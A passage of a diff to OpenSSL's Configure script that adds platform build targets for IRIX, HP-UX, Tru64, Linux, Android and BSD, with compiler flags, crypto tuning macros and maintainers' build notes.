+"irix-cc", "cc:-O2 -use_readonly_const -DTERMIOS -DB_ENDIAN::(unknown):::BN_LLONG RC4_CHAR RC4_CHUNK DES_PTR DES_RISC2 DES_UNROLL BF_PTR:${mips32_asm}:o32:dlfcn:irix-shared:::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+#### IRIX 6.x configs
+# Only N32 and N64 ABIs are supported. If you need O32 ABI build, invoke
+# './Configure irix-cc -o32' manually.
+"irix-mips3-gcc","gcc:-mabi=n32 -O3 -DTERMIOS -DB_ENDIAN -DBN_DIV3W::-D_SGI_MP_SOURCE:::MD2_CHAR RC4_INDEX RC4_CHAR RC4_CHUNK_LL DES_UNROLL DES_RISC2 DES_PTR BF_PTR SIXTY_FOUR_BIT:${mips64_asm}:n32:dlfcn:irix-shared::-mabi=n32:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::32",
+"irix-mips3-cc", "cc:-n32 -mips3 -O2 -use_readonly_const -G0 -rdata_shared -DTERMIOS -DB_ENDIAN -DBN_DIV3W::-D_SGI_MP_SOURCE:::DES_PTR RC4_CHAR RC4_CHUNK_LL DES_RISC2 DES_UNROLL BF_PTR SIXTY_FOUR_BIT:${mips64_asm}:n32:dlfcn:irix-shared::-n32:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::32",
+# N64 ABI builds.
+"irix64-mips4-gcc","gcc:-mabi=64 -mips4 -O3 -DTERMIOS -DB_ENDIAN -DBN_DIV3W::-D_SGI_MP_SOURCE:::RC4_CHAR RC4_CHUNK DES_RISC2 DES_UNROLL SIXTY_FOUR_BIT_LONG:${mips64_asm}:64:dlfcn:irix-shared::-mabi=64:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::64",
+"irix64-mips4-cc", "cc:-64 -mips4 -O2 -use_readonly_const -G0 -rdata_shared -DTERMIOS -DB_ENDIAN -DBN_DIV3W::-D_SGI_MP_SOURCE:::RC4_CHAR RC4_CHUNK DES_RISC2 DES_UNROLL SIXTY_FOUR_BIT_LONG:${mips64_asm}:64:dlfcn:irix-shared::-64:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::64",
+
+#### Unified HP-UX ANSI C configs.
+# Special notes:
+# - Originally we were optimizing at +O4 level. It should be noted
+#   that the only difference between +O3 and +O4 is global inter-
+#   procedural analysis. As it has to be performed during the link
+#   stage the compiler leaves behind certain pseudo-code in lib*.a
+#   which might be release or even patch level specific. Generating
+#   the machine code for and analyzing the *whole* program appears
+#   to be *extremely* memory demanding while the performance gain is
+#   actually questionable. The situation is intensified by the default
+#   HP-UX data set size limit (infamous 'maxdsiz' tunable) of 64MB
+#   which is way too low for +O4. In other words, doesn't +O3 make
+#   more sense?
+# - Keep in mind that the HP compiler by default generates code
+#   suitable for execution on the host you're currently compiling at.
+#   If the toolkit is ment to be used on various PA-RISC processors
+#   consider './config +DAportable'.
+# - +DD64 is chosen in favour of +DA2.0W because it's meant to be
+#   compatible with *future* releases.
+# - If you run ./Configure hpux-parisc-[g]cc manually don't forget to
+#   pass -D_REENTRANT on HP-UX 10 and later.
+# - -DMD32_XARRAY triggers workaround for compiler bug we ran into in
+#   32-bit message digests. (For the moment of this writing) HP C
+#   doesn't seem to "digest" too many local variables (they make "him"
+#   chew forever:-). For more details look-up MD32_XARRAY comment in
+#   crypto/sha/sha_lcl.h.
+#					<appro@fy.chalmers.se>
+#
+# Since there is mention of this in shlib/hpux10-cc.sh
+"hpux-parisc-cc-o4","cc:-Ae +O4 +ESlit -z -DB_ENDIAN -DBN_DIV2W -DMD32_XARRAY::-D_REENTRANT::-ldld:BN_LLONG DES_PTR DES_UNROLL DES_RISC1:${no_asm}:dl:hpux-shared:+Z:-b:.sl.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"hpux-parisc-gcc","gcc:-O3 -DB_ENDIAN -DBN_DIV2W::-D_REENTRANT::-Wl,+s -ldld:BN_LLONG DES_PTR DES_UNROLL DES_RISC1:${no_asm}:dl:hpux-shared:-fPIC:-shared:.sl.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"hpux-parisc1_1-gcc","gcc:-O3 -DB_ENDIAN -DBN_DIV2W::-D_REENTRANT::-Wl,+s -ldld:BN_LLONG DES_PTR DES_UNROLL DES_RISC1:${parisc11_asm}:dl:hpux-shared:-fPIC:-shared:.sl.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::/pa1.1",
+"hpux-parisc2-gcc","gcc:-march=2.0 -O3 -DB_ENDIAN -D_REENTRANT::::-Wl,+s -ldld:SIXTY_FOUR_BIT RC4_CHAR RC4_CHUNK DES_PTR DES_UNROLL DES_RISC1:".eval{my $asm=$parisc20_asm;$asm=~s/2W\./2\./;$asm=~s/:64/:32/;$asm}.":dl:hpux-shared:-fPIC:-shared:.sl.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::/pa20_32",
+"hpux64-parisc2-gcc","gcc:-O3 -DB_ENDIAN -D_REENTRANT::::-ldl:SIXTY_FOUR_BIT_LONG MD2_CHAR RC4_INDEX RC4_CHAR DES_UNROLL DES_RISC1 DES_INT::pa-risc2W.o:::::::::::::::void:dlfcn:hpux-shared:-fpic:-shared:.sl.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::/pa20_64",
+
+# More attempts at unified 10.X and 11.X targets for HP C compiler.
+#
+# Chris Ruemmler <ruemmler@cup.hp.com>
+# Kevin Steves <ks@hp.se>
+"hpux-parisc-cc","cc:+O3 +Optrs_strongly_typed -Ae +ESlit -DB_ENDIAN -DBN_DIV2W -DMD32_XARRAY::-D_REENTRANT::-Wl,+s -ldld:MD2_CHAR RC4_INDEX RC4_CHAR DES_UNROLL DES_RISC1 DES_INT:${no_asm}:dl:hpux-shared:+Z:-b:.sl.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"hpux-parisc1_1-cc","cc:+DA1.1 +O3 +Optrs_strongly_typed -Ae +ESlit -DB_ENDIAN -DMD32_XARRAY::-D_REENTRANT::-Wl,+s -ldld:MD2_CHAR RC4_INDEX RC4_CHAR DES_UNROLL DES_RISC1 DES_INT:${parisc11_asm}:dl:hpux-shared:+Z:-b:.sl.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::/pa1.1",
+"hpux-parisc2-cc","cc:+DA2.0 +DS2.0 +O3 +Optrs_strongly_typed -Ae +ESlit -DB_ENDIAN -DMD32_XARRAY -D_REENTRANT::::-Wl,+s -ldld:SIXTY_FOUR_BIT MD2_CHAR RC4_INDEX RC4_CHAR DES_UNROLL DES_RISC1 DES_INT:".eval{my $asm=$parisc20_asm;$asm=~s/2W\./2\./;$asm=~s/:64/:32/;$asm}.":dl:hpux-shared:+Z:-b:.sl.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::/pa20_32",
+"hpux64-parisc2-cc","cc:+DD64 +O3 +Optrs_strongly_typed -Ae +ESlit -DB_ENDIAN -DMD32_XARRAY -D_REENTRANT::::-ldl:SIXTY_FOUR_BIT_LONG MD2_CHAR RC4_INDEX RC4_CHAR DES_UNROLL DES_RISC1 DES_INT:${parisc20_asm}:dlfcn:hpux-shared:+Z:+DD64 -b:.sl.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::/pa20_64",
+
+# HP/UX IA-64 targets
+"hpux-ia64-cc","cc:-Ae +DD32 +O2 +Olit=all -z -DB_ENDIAN -D_REENTRANT::::-ldl:SIXTY_FOUR_BIT MD2_CHAR RC4_INDEX DES_UNROLL DES_RISC1 DES_INT:${ia64_asm}:dlfcn:hpux-shared:+Z:+DD32 -b:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::/hpux32",
+# Frank Geurts <frank.geurts@nl.abnamro.com> has patiently assisted with
+# with debugging of the following config.
+"hpux64-ia64-cc","cc:-Ae +DD64 +O3 +Olit=all -z -DB_ENDIAN -D_REENTRANT::::-ldl:SIXTY_FOUR_BIT_LONG MD2_CHAR RC4_INDEX DES_UNROLL DES_RISC1 DES_INT:${ia64_asm}:dlfcn:hpux-shared:+Z:+DD64 -b:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::/hpux64",
+# GCC builds...
+"hpux-ia64-gcc","gcc:-O3 -DB_ENDIAN -D_REENTRANT::::-ldl:SIXTY_FOUR_BIT MD2_CHAR RC4_INDEX DES_UNROLL DES_RISC1 DES_INT:${ia64_asm}:dlfcn:hpux-shared:-fpic:-shared:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::/hpux32",
+"hpux64-ia64-gcc","gcc:-mlp64 -O3 -DB_ENDIAN -D_REENTRANT::::-ldl:SIXTY_FOUR_BIT_LONG MD2_CHAR RC4_INDEX DES_UNROLL DES_RISC1 DES_INT:${ia64_asm}:dlfcn:hpux-shared:-fpic:-mlp64 -shared:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::/hpux64", 
+
+# Legacy HPUX 9.X configs...
+"hpux-cc",	"cc:-DB_ENDIAN -DBN_DIV2W -DMD32_XARRAY -Ae +ESlit +O2 -z::(unknown)::-Wl,+s -ldld:DES_PTR DES_UNROLL DES_RISC1:${no_asm}:dl:hpux-shared:+Z:-b:.sl.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"hpux-gcc",	"gcc:-DB_ENDIAN -DBN_DIV2W -O3::(unknown)::-Wl,+s -ldld:DES_PTR DES_UNROLL DES_RISC1:${no_asm}:dl:hpux-shared:-fPIC:-shared:.sl.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+
+#### HP MPE/iX http://jazz.external.hp.com/src/openssl/
+"MPE/iX-gcc",	"gcc:-D_ENDIAN -DBN_DIV2W -O3 -D_POSIX_SOURCE -D_SOCKET_SOURCE -I/SYSLOG/PUB::(unknown):MPE:-L/SYSLOG/PUB -lsyslog -lsocket -lcurses:BN_LLONG DES_PTR DES_UNROLL DES_RISC1:::",
+
+# DEC Alpha OSF/1/Tru64 targets.
+#
+#	"What's in a name? That which we call a rose
+#	 By any other word would smell as sweet."
+#
+# - William Shakespeare, "Romeo & Juliet", Act II, scene II.
+#
+# For gcc, the following gave a %50 speedup on a 164 over the 'DES_INT' version
+#
+"osf1-alpha-gcc", "gcc:-O3::(unknown):::SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_UNROLL DES_RISC1:${alpha_asm}:dlfcn:alpha-osf1-shared:::.so",
+"osf1-alpha-cc",  "cc:-std1 -tune host -O4 -readonly_strings::(unknown):::SIXTY_FOUR_BIT_LONG RC4_CHUNK:${alpha_asm}:dlfcn:alpha-osf1-shared:::.so",
+"tru64-alpha-cc", "cc:-std1 -tune host -fast -readonly_strings::-pthread:::SIXTY_FOUR_BIT_LONG RC4_CHUNK:${alpha_asm}:dlfcn:alpha-osf1-shared::-msym:.so",
+
+####
+#### Variety of LINUX:-)
+####
+# *-generic* is endian-neutral target, but ./config is free to
+# throw in -D[BL]_ENDIAN, whichever appropriate...
+"linux-generic32","gcc:-DTERMIOS -O3 -fomit-frame-pointer -Wall::-D_REENTRANT::-ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL BF_PTR:${no_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"linux-ppc",	"gcc:-DB_ENDIAN -DTERMIOS -O3 -Wall::-D_REENTRANT::-ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_RISC1 DES_UNROLL:${ppc32_asm}:linux32:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+
+#######################################################################
+# Note that -march is not among compiler options in below linux-armv4
+# target line. Not specifying one is intentional to give you choice to:
+#
+# a) rely on your compiler default by not specifying one;
+# b) specify your target platform explicitly for optimal performance,
+#    e.g. -march=armv6 or -march=armv7-a;
+# c) build "universal" binary that targets *range* of platforms by
+#    specifying minimum and maximum supported architecture;
+#
+# As for c) option. It actually makes no sense to specify maximum to be
+# less than ARMv7, because it's the least requirement for run-time
+# switch between platform-specific code paths. And without run-time
+# switch performance would be equivalent to one for minimum. Secondly,
+# there are some natural limitations that you'd have to accept and
+# respect. Most notably you can *not* build "universal" binary for
+# big-endian platform. This is because ARMv7 processor always picks
+# instructions in little-endian order. Another similar limitation is
+# that -mthumb can't "cross" -march=armv6t2 boundary, because that's
+# where it became Thumb-2. Well, this limitation is a bit artificial,
+# because it's not really impossible, but it's deemed too tricky to
+# support. And of course you have to be sure that your binutils are
+# actually up to the task of handling maximum target platform. With all
+# this in mind here is an example of how to configure "universal" build:
+#
+#       ./Configure linux-armv4 -march=armv6 -D__ARM_MAX_ARCH__=8
+#
+"linux-armv4",	"gcc:-DTERMIOS -O3 -Wall::-D_REENTRANT::-ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL BF_PTR:${armv4_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"linux-aarch64","gcc:-DTERMIOS -O3 -Wall::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL BF_PTR:${aarch64_asm}:linux64:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+# Configure script adds minimally required -march for assembly support,
+# if no -march was specified at command line. mips32 and mips64 below
+# refer to contemporary MIPS Architecture specifications, MIPS32 and
+# MIPS64, rather than to kernel bitness.
+"linux-mips32",	"gcc:-mabi=32 -DTERMIOS -O3 -Wall -DBN_DIV3W::-D_REENTRANT::-ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL BF_PTR:${mips32_asm}:o32:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"linux-mips64",   "gcc:-mabi=n32 -DTERMIOS -O3 -Wall -DBN_DIV3W::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL BF_PTR:${mips64_asm}:n32:dlfcn:linux-shared:-fPIC:-mabi=n32:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::32",
+"linux64-mips64",   "gcc:-mabi=64 -DTERMIOS -O3 -Wall -DBN_DIV3W::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL BF_PTR:${mips64_asm}:64:dlfcn:linux-shared:-fPIC:-mabi=64:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::64",
+#### IA-32 targets...
+"linux-ia32-icc",	"icc:-DL_ENDIAN -DTERMIOS -O2::-D_REENTRANT::-ldl -no_cpprt:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn:linux-shared:-KPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"linux-elf",	"gcc:-DL_ENDIAN -DTERMIOS -O3 -fomit-frame-pointer -Wall::-D_REENTRANT::-ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"linux-aout",	"gcc:-DL_ENDIAN -DTERMIOS -O3 -fomit-frame-pointer -march=i486 -Wall::(unknown):::BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_asm}:a.out",
+####
+"linux-generic64","gcc:-DTERMIOS -O3 -Wall::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL BF_PTR:${no_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"linux-ppc64",	"gcc:-m64 -DB_ENDIAN -DTERMIOS -O3 -Wall::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHAR RC4_CHUNK DES_RISC1 DES_UNROLL:${ppc64_asm}:linux64:dlfcn:linux-shared:-fPIC:-m64:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::64",
+"linux-ppc64le","gcc:-m64 -DL_ENDIAN -DTERMIOS -O3 -Wall::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHAR RC4_CHUNK DES_RISC1 DES_UNROLL:$ppc64_asm:linux64le:dlfcn:linux-shared:-fPIC:-m64:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::",
+"linux-ia64",	"gcc:-DL_ENDIAN -DTERMIOS -O3 -Wall::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_UNROLL DES_INT:${ia64_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"linux-ia64-icc","icc:-DL_ENDIAN -DTERMIOS -O2 -Wall::-D_REENTRANT::-ldl -no_cpprt:SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_RISC1 DES_INT:${ia64_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"linux-x86_64",	"gcc:-m64 -DL_ENDIAN -DTERMIOS -O3 -Wall::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:${x86_64_asm}:elf:dlfcn:linux-shared:-fPIC:-m64:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::64",
+"linux-x86_64-musl", "gcc:-m64 -DL_ENDIAN -DTERMIOS -Os -Wall::-D_REENTRANT::-static:SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:${x86_64_asm}:elf:dlfcn:linux-shared:-fPIC:-m64:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::64",
+"linux-x86_64-clang",	"clang: -m64 -DL_ENDIAN -DTERMIOS -O3 -Weverything $clang_disabled_warnings -Qunused-arguments::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:${x86_64_asm}:elf:dlfcn:linux-shared:-fPIC:-m64:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::64",
+"linux-x86_64-icc", "icc:-DL_ENDIAN -DTERMIOS -O2::-D_REENTRANT::-ldl -no_cpprt:SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:${x86_64_asm}:elf:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::64",
+"linux-x32",	"gcc:-mx32 -DL_ENDIAN -DTERMIOS -O3 -Wall::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT RC4_CHUNK_LL DES_INT DES_UNROLL:${x86_64_asm}:elf:dlfcn:linux-shared:-fPIC:-mx32:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::x32",
+"linux64-s390x",	"gcc:-m64 -DB_ENDIAN -DTERMIOS -O3 -Wall::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL:${s390x_asm}:64:dlfcn:linux-shared:-fPIC:-m64:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::64",
+#### So called "highgprs" target for z/Architecture CPUs
+# "Highgprs" is kernel feature first implemented in Linux 2.6.32, see
+# /proc/cpuinfo. The idea is to preserve most significant bits of
+# general purpose registers not only upon 32-bit process context
+# switch, but even on asynchronous signal delivery to such process.
+# This makes it possible to deploy 64-bit instructions even in legacy
+# application context and achieve better [or should we say adequate]
+# performance. The build is binary compatible with linux-generic32,
+# and the idea is to be able to install the resulting libcrypto.so
+# alongside generic one, e.g. as /lib/highgprs/libcrypto.so.x.y, for
+# ldconfig and run-time linker to autodiscover. Unfortunately it
+# doesn't work just yet, because of couple of bugs in glibc
+# sysdeps/s390/dl-procinfo.c affecting ldconfig and ld.so.1...
+"linux32-s390x",	"gcc:-m31 -Wa,-mzarch -DB_ENDIAN -DTERMIOS -O3 -Wall::-D_REENTRANT::-ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL:".eval{my $asm=$s390x_asm;$asm=~s/bn\-s390x\.o/bn_asm.o/;$asm}.":31:dlfcn:linux-shared:-fPIC:-m31:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::/highgprs",
+#### SPARC Linux setups
+# Ray Miller <ray.miller@computing-services.oxford.ac.uk> has patiently
+# assisted with debugging of following two configs.
+"linux-sparcv8","gcc:-mv8 -DB_ENDIAN -DTERMIOS -O3 -fomit-frame-pointer -Wall -DBN_DIV2W::-D_REENTRANT::-ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_UNROLL BF_PTR:${sparcv8_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+# it's a real mess with -mcpu=ultrasparc option under Linux, but
+# -Wa,-Av8plus should do the trick no matter what.
+"linux-sparcv9","gcc:-m32 -mcpu=ultrasparc -DB_ENDIAN -DTERMIOS -O3 -fomit-frame-pointer -Wall -Wa,-Av8plus -DBN_DIV2W::-D_REENTRANT:ULTRASPARC:-ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_UNROLL BF_PTR:${sparcv9_asm}:dlfcn:linux-shared:-fPIC:-m32:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+# GCC 3.1 is a requirement
+"linux64-sparcv9","gcc:-m64 -mcpu=ultrasparc -DB_ENDIAN -DTERMIOS -O3 -fomit-frame-pointer -Wall::-D_REENTRANT:ULTRASPARC:-ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_INT DES_PTR DES_RISC1 DES_UNROLL BF_PTR:${sparcv9_asm}:dlfcn:linux-shared:-fPIC:-m64:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::64",
+#### Alpha Linux with GNU C and Compaq C setups
+# Special notes:
+# - linux-alpha+bwx-gcc is ment to be used from ./config only. If you
+#   ought to run './Configure linux-alpha+bwx-gcc' manually, do
+#   complement the command line with -mcpu=ev56, -mcpu=ev6 or whatever
+#   which is appropriate.
+# - If you use ccc keep in mind that -fast implies -arch host and the
+#   compiler is free to issue instructions which gonna make elder CPU
+#   choke. If you wish to build "blended" toolkit, add -arch generic
+#   *after* -fast and invoke './Configure linux-alpha-ccc' manually.
+#
+#					<appro@fy.chalmers.se>
+#
+"linux-alpha-gcc","gcc:-O3 -DL_ENDIAN -DTERMIOS::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_RISC1 DES_UNROLL:${alpha_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"linux-alpha+bwx-gcc","gcc:-O3 -DL_ENDIAN -DTERMIOS::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHAR RC4_CHUNK DES_RISC1 DES_UNROLL:${alpha_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"linux-alpha-ccc","ccc:-fast -readonly_strings -DL_ENDIAN -DTERMIOS::-D_REENTRANT:::SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_PTR DES_RISC1 DES_UNROLL:${alpha_asm}",
+"linux-alpha+bwx-ccc","ccc:-fast -readonly_strings -DL_ENDIAN -DTERMIOS::-D_REENTRANT:::SIXTY_FOUR_BIT_LONG RC4_CHAR RC4_CHUNK DES_INT DES_PTR DES_RISC1 DES_UNROLL:${alpha_asm}",
+
+# Android: linux-* but without -DTERMIOS and pointers to headers and libs.
+"android","gcc:-mandroid -I\$(ANDROID_DEV)/include -B\$(ANDROID_DEV)/lib -O3 -fomit-frame-pointer -Wall::-D_REENTRANT::-ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL BF_PTR:${no_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"android-x86","gcc:-mandroid -I\$(ANDROID_DEV)/include -B\$(ANDROID_DEV)/lib -O3 -fomit-frame-pointer -Wall::-D_REENTRANT::-ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:".eval{my $asm=${x86_elf_asm};$asm=~s/:elf/:android/;$asm}.":dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"android-armv7","gcc:-march=armv7-a -mandroid -I\$(ANDROID_DEV)/include -B\$(ANDROID_DEV)/lib -O3 -fomit-frame-pointer -Wall::-D_REENTRANT::-ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL BF_PTR:${armv4_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"android-mips","gcc:-mandroid -I\$(ANDROID_DEV)/include -B\$(ANDROID_DEV)/lib -O3 -Wall::-D_REENTRANT::-ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL BF_PTR:${mips32_asm}:o32:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+
+#### *BSD [do see comment about ${BSDthreads} above!]
+"BSD-generic32","gcc:-DTERMIOS -O3 -fomit-frame-pointer -Wall::${BSDthreads}:::BN_LLONG RC2_CHAR RC4_INDEX DES_INT DES_UNROLL:${no_asm}:dlfcn:bsd-gcc-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"BSD-x86",	"gcc:-DL_ENDIAN -DTERMIOS -O3 -fomit-frame-pointer -Wall::${BSDthreads}:::BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_asm}:a.out:dlfcn:bsd-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"BSD-x86-elf",	"gcc:-DL_ENDIAN -DTERMIOS -O3 -fomit-frame-pointer -Wall::${BSDthreads}:::BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn:bsd-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-BSD-x86-elf",	"gcc:-DL_ENDIAN -DTERMIOS -O3 -Wall -g::${BSDthreads}:::BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn:bsd-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"BSD-sparcv8",	"gcc:-DB_ENDIAN -DTERMIOS -O3 -mv8 -Wall::${BSDthreads}:::BN_LLONG RC2_CHAR RC4_INDEX DES_INT DES_UNROLL:${sparcv8_asm}:dlfcn:bsd-gcc-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+
+"BSD-generic64","gcc:-DTERMIOS -O3 -Wall::${BSDthreads}:::SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:${no_asm}:dlfcn:bsd-gcc-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+# -DMD32_REG_T=int doesn't actually belong in sparc64 target, it
+# simply *happens* to work around a compiler bug in gcc 3.3.3,
+# triggered by RIPEMD160 code.
+"BSD-sparc64",	"gcc:-DB_ENDIAN -DTERMIOS -O3 -DMD32_REG_T=int -Wall::${BSDthreads}:::BN_LLONG RC2_CHAR RC4_CHUNK DES_INT DES_PTR DES_RISC2 BF_PTR:${sparcv9_asm}:dlfcn:bsd-gcc-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"BSD-ia64",	"gcc:-DL_ENDIAN -DTERMIOS -O3 -Wall::${BSDthreads}:::SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_UNROLL DES_INT:${ia64_asm}:dlfcn:bsd-gcc-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"BSD-x86_64",	"gcc:-DL_ENDIAN -DTERMIOS -O3 -Wall::${BSDthreads}:::SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:${x86_64_asm}:elf:dlfcn:bsd-gcc-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+
+"bsdi-elf-gcc",     "gcc:-DPERL5 -DL_ENDIAN -fomit-frame-pointer -O3 -march=i486 -Wall::(unknown)::-ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn:bsd-gcc-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+
+"nextstep",	"cc:-O -Wall:<libc.h>:(unknown):::BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:::",
+"nextstep3.3",	"cc:-O3 -Wall:<libc.h>:(unknown):::BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:::",
+
+# NCR MP-RAS UNIX ver 02.03.01
+"ncr-scde","cc:-O6 -Xa -Hoff=BEHAVED -686 -Hwide -Hiw::(unknown)::-lsocket -lnsl -lc89:${x86_gcc_des} ${x86_gcc_opts}:::",
+
+# QNX
+"qnx4",	"cc:-DL_ENDIAN -DTERMIOS::(unknown):::${x86_gcc_des} ${x86_gcc_opts}:",
+"QNX6",       "gcc:-DTERMIOS::::-lsocket::${no_asm}:dlfcn:bsd-gcc-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"QNX6-i386",  "gcc:-DL_ENDIAN -DTERMIOS -O2 -Wall::::-lsocket:${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn:bsd-gcc-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+
+# BeOS
